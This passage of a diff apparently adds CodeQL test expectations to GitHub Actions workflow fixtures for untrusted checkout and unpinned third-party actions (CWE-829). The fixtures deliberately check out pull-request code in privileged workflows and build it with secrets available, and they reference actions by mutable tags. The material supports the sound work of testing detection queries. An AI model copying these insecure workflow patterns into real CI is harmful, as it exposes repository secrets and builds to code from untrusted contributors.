@@ jobs: git merge --no-commit --no-edit origin/$HEAD_BRANCH env: HEAD_BRANCH: ${{ github.head_ref }} - - uses: actions/setup-node@v1 + - uses: actions/setup-node@v1 # $ Alert[actions/untrusted-checkout/critical] # 2. Potentially untrusted commands are being run during "npm install" or "npm build" as # the build scripts and referenced packages are controlled by the author of the pull request - run: | npm install - npm build + npm build # $ Sink[actions/untrusted-checkout/critical] 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml index 221854ec2042..984c56d9028d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml @@ -11,7 +11,7 @@ jobs: steps: - name: (PR comment) Get PR branch if: ${{ github.event_name == 'issue_comment' }} - uses: xt0rted/pull-request-comment-branch@v2 + uses: xt0rted/pull-request-comment-branch@v2 # $ Alert[actions/unpinned-tag] id: comment-branch - name: (PR comment) Checkout PR branch if: ${{ github.event_name == 'issue_comment' }} @@ -24,7 +24,7 @@ jobs: steps: - name: (PR comment) Get PR branch if: ${{ github.event_name == 'issue_comment' }} - uses: xt0rted/pull-request-comment-branch@v2 + uses: xt0rted/pull-request-comment-branch@v2 # $ Alert[actions/unpinned-tag] id: comment-branch - name: (PR comment) Checkout PR branch @@ -38,7 +38,7 @@ jobs: steps: - name: resolve pr refs id: refs - uses: eficode/resolve-pr-refs@main + uses: eficode/resolve-pr-refs@main # $ Alert[actions/unpinned-tag] with: token: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml index ece4c02c3565..133d033a4e9e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml 
@@ -13,7 +13,7 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.ref || github.head_ref }} # Checkout the branch that made the PR or the comment's PR branch - test2: + test2: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' steps: @@ -21,7 +21,7 @@ jobs: with: ref: refs/pull/${{ github.event.issue.number }}/merge - test3: + test3: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' steps: @@ -29,7 +29,7 @@ jobs: with: ref: ${{ format('refs/pull/{0}/merge', github.event.issue.number) }} - test4: + test4: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: - name: Checkout Branch @@ -37,10 +37,10 @@ jobs: with: ref: ${{ (github.event_name == 'pull_request_review_comment') && format('refs/pull/{0}/merge', github.event.pull_request.number) || '' }} - test5: + test5: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: - name: Checkout Branch uses: actions/checkout@v4 with: - ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} + ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml index 8c0865f598cd..6dd5205c08e3 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml 
@@ -30,7 +30,7 @@ jobs: with: ref: ${{ steps.get-sha.outputs.sha }} - test2: + test2: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: @@ -47,4 +47,4 @@ jobs: echo "branch=$REF" >> $GITHUB_OUTPUT - uses: actions/checkout@v4 with: - ref: ${{ steps.vars.outputs.branch }} + ref: ${{ steps.vars.outputs.branch }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml index ac013eb6e2f9..b25d53c739ee 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml @@ -27,12 +27,12 @@ jobs: with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} token: ${{ secrets.GITHUB_TOKEN }} - - uses: actions/checkout@v4 + - uses: actions/checkout@v4 # $ Alert[actions/untrusted-checkout/high] with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.sha }} token: ${{ secrets.GITHUB_TOKEN }} - test2: + test2: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: - name: Get Info from comment @@ -59,7 +59,7 @@ jobs: with: ref: ${{ steps.get-sha.outputs.sha }} - test3: + test3: # $ Alert[actions/untrusted-checkout/high] if: github.event.comment.body == '@excalibot trigger release' && github.event.issue.pull_request runs-on: ubuntu-latest steps: @@ -80,7 +80,7 @@ jobs: with: ref: ${{ steps.sha.outputs.result }} - test4: + test4: # $ Alert[actions/untrusted-checkout/high] if: github.event.issue.pull_request && contains(github.event.comment.body, '!bench_parser') runs-on: ubuntu-latest steps: @@ -97,7 +97,7 @@ jobs: with: ref: ${{ steps.sha.outputs.result }} - test5: + test5: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-20.04 steps: - id: request 
@@ -111,4 +111,4 @@ jobs: with: token: ${{ secrets.GITHUB_TOKEN }} repository: ${{fromJson(steps.request.outputs.data).head.repo.full_name}} - ref: ${{fromJson(steps.request.outputs.data).head.ref}} + ref: ${{fromJson(steps.request.outputs.data).head.ref}} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml index 8485ad0ed671..0831bc9217cb 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml @@ -23,15 +23,15 @@ jobs: route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Checkout PR minor patch wildcard + - name: Checkout PR minor patch wildcard # $ Alert[actions/unversioned-immutable-action] - uses: actions/checkout@v2.x.xx with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} token: ${{ secrets.GITHUB_TOKEN }} - - name: Checkout PR minor wildcard incomplete patch + - name: Checkout PR minor wildcard incomplete patch # $ Alert[actions/untrusted-checkout/high] Alert[actions/unversioned-immutable-action] uses: actions/checkout@v2.x. - - name: Run latest action - uses: some-action/some-repo@latest + - name: Run latest action # $ Alert[actions/unversioned-immutable-action] + uses: some-action/some-repo@latest # $ Alert[actions/unpinned-tag] with: some-input: some-value - name: run the latest checkout action diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml index 56bb143cf367..32cef70963ae 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml @@ -17,11 +17,11 @@ jobs: npm install npm build - - uses: completely/fakeaction@v2 + - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 + - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml index 6014d08ed806..fef28af7925d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml @@ -13,16 +13,16 @@ jobs: with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-node@v1 + - uses: actions/setup-node@v1 # $ Alert[actions/untrusted-checkout/critical] - run: | npm install npm build - - uses: completely/fakeaction@v2 + - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] Sink[actions/untrusted-checkout/critical] with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 + - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml index 49908b7b4c51..47aa7725a812 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml 
@@ -33,7 +33,7 @@ jobs: - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 with: egress-policy: audit - - uses: rlespinasse/github-slug-action@v4 + - uses: rlespinasse/github-slug-action@v4 # $ Alert[actions/unpinned-tag] with: short-length: 8 - name: Check for profanities in issue body @@ -100,7 +100,7 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 @@ -109,7 +109,7 @@ jobs: npm run lint npm start - toppings: + toppings: # $ Sink[actions/untrusted-checkout/critical] runs-on: ubuntu-latest timeout-minutes: 1 if: github.event_name == 'pull_request' @@ -126,11 +126,11 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint + npm run lint # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml index b539c562084e..dbeeb1e0eebc 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml @@ -26,8 +26,8 @@ jobs: fetch-depth: 1 ref: ${{ steps.set_ref.outputs.ref }} - - name: "setup ruby" + - name: "setup ruby" # $ Alert[actions/untrusted-checkout/medium] if: success() - uses: "ruby/setup-ruby@v1" + uses: "ruby/setup-ruby@v1" # $ Alert[actions/unpinned-tag] with: ruby-version: 2.7 diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml index 6900c3bc23fa..4035b3fb4643 100644 
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml @@ -33,9 +33,9 @@ jobs: # For PRs make sure to checkout the PR branch ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages + - name: Setup Pages # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 - - name: Build with Jekyll + - name: Build with Jekyll # $ Alert[actions/unversioned-immutable-action] uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 with: source: ./ @@ -44,7 +44,7 @@ jobs: # Automatically uploads an artifact from the './_site' directory by default uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 # Deployment job - deploy: + deploy: # $ Alert[actions/unversioned-immutable-action] environment: name: 'Pages Preview' url: ${{ steps.deployment.outputs.page_url }} @@ -60,4 +60,4 @@ jobs: id: deployment uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 with: - preview: 'true' + preview: 'true' # $ Alert[actions/unversioned-immutable-action] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml index 5501beb9ea2f..9ecc8c2367bb 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml 
@@ -39,12 +39,12 @@ jobs: with: ref: ${{ steps.branch-deploy.outputs.ref }} - - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 # $ Alert[actions/untrusted-checkout/critical] if: ${{ steps.branch-deploy.outputs.continue == 'true' }} with: bundler-cache: true - - name: bootstrap + - name: bootstrap # $ Sink[actions/untrusted-checkout/critical] if: ${{ steps.branch-deploy.outputs.continue == 'true' }} run: script/bootstrap @@ -55,4 +55,4 @@ jobs: set -o pipefail script/deploy | tee deploy.out bundle exec ruby script/ci/render_deploy_message.rb - rm deploy.out + rm deploy.out # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml index 4d5ae1f528cd..39fc63beb3f9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml @@ -22,7 +22,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Checkout + - name: Checkout # $ Alert[actions/untrusted-checkout/medium] if: ${{ github.event_name != 'pull_request_target' }} uses: actions/checkout@v3 with: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml index 061ff7d02c5e..a89f4ef3031f 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml 
@@ -57,7 +57,7 @@ jobs: - name: checkout uses: actions/checkout@v3 if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} - - uses: amannn/action-semantic-pull-request@v5 + - uses: amannn/action-semantic-pull-request@v5 # $ Alert[actions/unpinned-tag] if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} with: requireScope: false @@ -106,7 +106,7 @@ jobs: persist-credentials: false submodules: false lfs: true - - uses: actionsdesk/lfs-warning@v3.2 + - uses: actionsdesk/lfs-warning@v3.2 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] name: lfs-warning with: labelName: lfs-detected! @@ -141,11 +141,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - uses: cachix/install-nix-action@v20 + - uses: cachix/install-nix-action@v20 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] with: nix_path: nixpkgs=channel:nixos-unstable - - uses: DeterminateSystems/magic-nix-cache-action@main - - uses: cachix/cachix-action@master + - uses: DeterminateSystems/magic-nix-cache-action@main # $ Alert[actions/unpinned-tag] + - uses: cachix/cachix-action@master # $ Alert[actions/unpinned-tag] with: authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" name: composable @@ -219,12 +219,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha }} persist-credentials: false - - name: Build all packages + - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-outputs - - id: ok + - id: ok # $ Sink[actions/untrusted-checkout/critical] run: echo "ok=true" >> "$GITHUB_OUTPUT" build-all-checks-packages: 
@@ -253,12 +253,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: Build all packages + - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-checks - - id: ok + - id: ok # $ Sink[actions/untrusted-checkout/critical] run: echo "ok=true" >> "$GITHUB_OUTPUT" @@ -287,12 +287,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: build-all-deps-packages + - name: build-all-deps-packages # $ Alert[actions/untrusted-checkout/critical] if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-deps - - id: ok + - id: ok # $ Sink[actions/untrusted-checkout/critical] run: echo "ok=true" >> "$GITHUB_OUTPUT" draft-release-check: @@ -344,7 +344,7 @@ jobs: with: fetch-depth: 0 - name: Login to DockerHub - uses: docker/login-action@v2 + uses: docker/login-action@v2 # $ Alert[actions/unpinned-tag] with: username: ${{ secrets.DOCKER_HUB_USERNAME }} password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} @@ -353,7 +353,7 @@ jobs: nix run .#generate-release-artifacts --print-build-logs - name: Release artifacts - uses: softprops/action-gh-release@v1 + uses: softprops/action-gh-release@v1 # $ Alert[actions/unpinned-tag] with: draft: true prerelease: false 
@@ -388,11 +388,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: Build all packages + - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] uses: "./.github/templates/watch-exec" with: command: nix -- build .#all - - name: Publish cmc-api to docker hub + - name: Publish cmc-api to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/docker-image-cmc-api.tar.gz @@ -401,7 +401,7 @@ jobs: name: cmc-api artifact: cmc-api:latest - - name: Publish devnet-xc to docker hub + - name: Publish devnet-xc to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/docker-image-devnet-xc.tar.gz @@ -411,7 +411,7 @@ jobs: artifact: devnet-xc:latest tag: ${{ inputs.github_event_name == 'push' && 'main' || ''}} - - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub + - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/hyperspace-composable-rococo-picasso-rococo.tar.gz @@ -420,7 +420,7 @@ jobs: name: hyperspace-composable-rococo-picasso-rococo artifact: hyperspace-composable-rococo-picasso-rococo:latest - - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub + - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/hyperspace-composable-polkadot-picasso-kusama.tar.gz @@ -429,7 +429,7 @@ jobs: name: hyperspace-composable-polkadot-picasso-kusama artifact: hyperspace-composable-polkadot-picasso-kusama:latest - mantis-e2e: + mantis-e2e: # $ Sink[actions/untrusted-checkout/critical] name: mantis-e2e outputs: ok: ${{ steps.ok.outputs.ok }} 
@@ -446,11 +446,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - uses: cachix/install-nix-action@v20 + - uses: cachix/install-nix-action@v20 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] with: nix_path: nixpkgs=channel:nixos-unstable - - uses: DeterminateSystems/magic-nix-cache-action@main - - uses: cachix/cachix-action@master + - uses: DeterminateSystems/magic-nix-cache-action@main # $ Alert[actions/unpinned-tag] + - uses: cachix/cachix-action@master # $ Alert[actions/unpinned-tag] with: authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" name: composable diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml index d8381176fd23..54f740735e25 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml @@ -17,7 +17,7 @@ jobs: ref: ${{ github.head_ref }} token: ${{ secrets.DOCUBOT_REPO_PAT }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] ./cmd env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml index 72db8c29370d..407659f09db5 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml 
@@ -17,7 +17,7 @@ jobs: GIT_REF: ${{ steps.resolve-step.outputs.GIT_REF }} steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - if: github.event_name == 'workflow_run' + - if: github.event_name == 'workflow_run' # $ Alert[actions/unversioned-immutable-action] uses: ./.github/actions/download-artifact - id: resolve-step env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml index 3b8a6d6dd62a..b338fbc5f16b 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml @@ -23,7 +23,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ inputs.branch }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/critical] npm install npm run lint - + # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml index e8b5466f7516..8bdb8fc75ede 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml @@ -22,12 +22,12 @@ jobs: with: ref: ${{ github.event.after || github.event.pull_request.head.sha }} - - name: Build + - name: Build # $ Alert[actions/untrusted-checkout/critical] working-directory: custom-payment-flow/client/android-kotlin run: | ./gradlew build - dependabot-auto-merge: + dependabot-auto-merge: # $ Sink[actions/untrusted-checkout/critical] if: ${{ github.event.pull_request && github.actor == 'dependabot[bot]' }} needs: android_build permissions: 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml index 16bb6bf876c3..448654fe45d8 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml @@ -87,8 +87,8 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup + - name: Environment setup # $ Alert[actions/untrusted-checkout/critical] Alert[actions/unversioned-immutable-action] uses: ./.github/actions/setup-env with: - azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml index 878b83779613..9f0ee5cf96d9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml @@ -89,7 +89,7 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup + - name: Environment setup # $ Alert[actions/unversioned-immutable-action] uses: ./.github/actions/setup-env with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml index 0a73e86d5fc6..c8a68d73e588 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml 
@@ -12,7 +12,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Check repository permission for user - uses: sushichop/action-repository-permission@v2 + uses: sushichop/action-repository-permission@v2 # $ Alert[actions/unpinned-tag] with: required-permission: write reaction-permitted: rocket @@ -22,7 +22,7 @@ jobs: with: ref: refs/pull/${{ github.event.issue.number }}/head fetch-depth: 0 - - uses: actions/setup-node@v3 + - uses: actions/setup-node@v3 # $ Alert[actions/untrusted-checkout/high] with: node-version: 16 - name: Danger JS diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml index 6f03a0e966a1..15ab46cc70a1 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml @@ -102,13 +102,13 @@ jobs: if: contains(github.event.comment.body, '/rollback') uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 - - name: Checkout PR branch + - name: Checkout PR branch # $ Alert[actions/unversioned-immutable-action] if: contains(github.event.comment.body, '/deploy') uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get environment from comment + - name: Get environment from comment # $ Alert[actions/unversioned-immutable-action] id: environment shell: bash env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml index 0be96a4140ef..ef42bbb4a3c5 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml 
@@ -62,7 +62,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Install GH CLI + - name: Install GH CLI # $ Alert[actions/unversioned-immutable-action] uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 - name: Check comment keywords @@ -112,7 +112,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Log into Azure + - name: Log into Azure # $ Alert[actions/unversioned-immutable-action] uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 with: creds: ${{ secrets.AZURE_CREDENTIALS }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml index f679b772e340..d5de91480cb1 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml @@ -16,8 +16,8 @@ jobs: ref: ${{ github.event.workflow_run.head_branch }} fetch-depth: 0 - - name: SonarCloud Scan - uses: sonarsource/sonarcloud-github-action@master + - name: SonarCloud Scan # $ Alert[actions/untrusted-checkout/critical] + uses: sonarsource/sonarcloud-github-action@master # $ Alert[actions/unpinned-tag] env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml index 6347db51e3c9..96de593004ab 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml 
